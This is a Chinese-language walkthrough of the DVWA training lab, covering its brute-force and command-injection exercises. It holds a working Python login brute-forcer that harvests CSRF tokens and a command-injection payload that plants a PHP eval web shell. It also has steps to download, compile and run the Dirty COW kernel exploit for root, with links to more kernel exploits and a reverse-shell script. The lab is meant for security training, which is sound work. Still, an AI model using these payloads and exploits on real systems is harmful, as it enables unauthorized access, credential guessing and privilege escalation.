链接: https://github.com/dhgdhg/DVWA-Note
Brute Force
low: zap or burpsuit
medium: zap or burpsuit
hight:
<details> <summary>使用py进行暴力破解</summary>import requests import re def fun(): username_file_path = 'E:username.txt' password_file_path = 'E:password.txt' host = '192.168.119.131 ' cookie = 'security=high; PHPSESSID=kvuut861afcfg8k4fe5bhnrj01' headers = { 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'DNT': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Referer': 'https://{}/DVWA/vulnerabilities/brute/'.format(host), 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7', 'Cookie': cookie, 'Host': host } session = requests.session() response = session.get( 'http://{}/DVWA/vulnerabilities/brute/'.format(host), headers=headers) user_token = re.search( '<input type=.hidden. name=.user_token. value=.(.*?). />', response.text).groups()[0].strip() with open(username_file_path, 'r') as usernames: for username in usernames: username = username.strip() with open(password_file_path, 'r') as passwords: for password in passwords: password = password.strip() url = 'http://{}/DVWA/vulnerabilities/brute/?username={}&password={}&Login=Login&user_token={}'.format( host,username, password, user_token) response = session.get(url, headers=headers) if 'Welcome' in response.text: print('-----------------------') print('\n\n', username, password, '\n\n') print('-----------------------') return else: print(username, password) user_token = re.search( '<input type=.hidden. name=.user_token. value=.(.*?). />', response.text).groups()[0].strip() if __name__ == "__main__": fun()</details>
Command Injection
- low:
- 写入一句话木马
127.0.0.1&&echo '<?php eval($_POST["cmd"]) ?>' > e1.php
- 使用菜刀
- 在菜刀中打开终端
- 查看系统版本
uname -acat /etc/issue
- 提权
- linux反弹shell
- 菜刀可以拖动文件, 到测试服务器
- https://github.com/wantongtang/pyshell/blob/master/back.py
curl https://www.exploit-db.com/download/40847 -k > 40847.cpp- curl不到可以直接点击链接用浏览器下载然后通过菜刀拖进去
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil./dcow -s- 执行后报错需要在虚拟机中执行
sudo mv /opt/lampp/lib/libstdc++.so.6 /opt/lampp/lib/libstdc++.so.6.orig
- 提权成功
- 提权不成功可以换个脏牛试试
https://github.com/SecWiki/linux-kernel-exploits/tree/master/2016/CVE-2016-5195- 40616.c
gcc 40616.c -o cc -pthread;./cc- 可能会报错, 但不影响执行
- 漏洞检测工具: https://github.com/mzet-/linux-exploit-suggester
- linux反弹shell
- 写入一句话木马
- medium
- 同理
- high
- 同理
- low:
京公网安备 11010502036488号